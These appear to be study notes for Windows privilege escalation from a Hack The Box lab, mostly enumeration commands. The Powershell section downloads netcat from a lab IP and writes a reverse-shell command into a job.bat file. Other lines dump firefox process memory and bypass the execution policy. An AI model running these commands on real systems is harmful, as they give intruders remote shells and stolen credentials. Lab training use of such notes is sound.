Windows Privilege Escalation

Basic Enumeration

#Enumerate Privileges

whoami /priv

#File Privileges

icacls {FILENAME}

#Enumerate Scheduled TASKS

schtasks

#Hidden Files

dir -a

#OS information

wmic os list brief

Get-WmiObject -Class Win32_OperatingSystem | select SystemDirectory,BuildNumber,SerialNumber,Version | ft

#User SID

Get-CimInstance -ClassName Win32_UserAccount -Filter "Name='bob.smith'" | Select-Object SID

#Group SID

$group = Get-WmiObject -Query "SELECT * FROM Win32_Group WHERE Name = 'HR'"
$group.SID

Powershell

#Running Process

ps

#Download files

wget [<http://CHANGEIP/nc64.exe>](<http://10.10.14.3/nc64.exe>) -outfile nc64.exe

#Modify File

echo C:\\Log-Management\\nc64.exe -e cmd.exe 10.10.14.3:1234 > C:\\Log-Management\\job.bat

HTB module

#RDP to lab target
xfreerdp /v:<target IP address> /u:htb-student /p:<password>

#Get information about the operating system
Get-WmiObject -Class win32_OperatingSystem

#View all files and directories in the c:\\ root directory
dir c:\\ /a

#Graphically displaying the directory structure of a path
tree <directory>

#Walk through results of the `tree` command page by page
tree c:\\ /f | more

#View the permissions set on a directory
icacls <directory> 

#Grant a user full permissions to a directory 
icacls c:\\users /grant joe:f

#Remove a user's permissions on a directory
icacls c:\\users /remove joe

#`PowerShell` cmdlet to view running services
Get-Service

#Display the help menu for a specific command
help <command>

#List `PowerShell` aliases
get-alias

#Create a new `PowerShell` alias
New-Alias -Name "Show-Files" Get-ChildItem 

#View imported `PowerShell` modules and their associated commands
Get-Module | select Name,ExportedCommands | fl

#View the `PowerShell` execution policy 
Get-ExecutionPolicy -List

#Set the `PowerShell` execution policy to bypass for the current session
Set-ExecutionPolicy Bypass -Scope Process

#Get information about the operating system with `wmic`
wmic os list brief

#Call methods of `WMI` objects 
Invoke-WmiMethod

#View the current user's SID
whoami /user

#View information about a registry key 
reg query <key>

#Check which `Defender` protection settings are enabled
Get-MpComputerStatus

#Load Server Configuration menu in Windows Server Core
sconfig 

Remote Management

evil-winrm -i <IP> -u <USER> -p <PASSWORD>

Process Enumeration

#List Process
ps
get-process
#dump the process memory
./procdump.exe -accepteula -ma 6360 firefox.dmp

Look for streams

dir /R

#You can read the stream by piping it into more
more < hm.txt:root.txt

Mdbtools

#install
apt install mdbtools
#list programs
mdb- <backup>
#List tables
mdb-tables <databasename>
#dump a table
mdb-export <databasename> <tablename>
#Loop to enumerate non-empty tables
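# Enumerate every table in backup.mdb and report the ones that contain rows.
# mdb-export always prints a header line, so a line count of 1 means the
# table is empty; only counts above 1 are printed.
# Fixes over the original one-liner: `read -r` keeps backslashes in table
# names intact, and "$table" / "$lines" are quoted so names containing
# spaces or glob characters are not split or expanded.
mdb-tables backup.mdb | tr ' ' '\n' | grep . | while IFS= read -r table; do
  lines=$(mdb-export backup.mdb "$table" | wc -l)
  if [ "$lines" -gt 1 ]; then
    printf '%s: %s\n' "$table" "$lines"
  fi
done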

Online Access DB Opener

Tools:

Last updated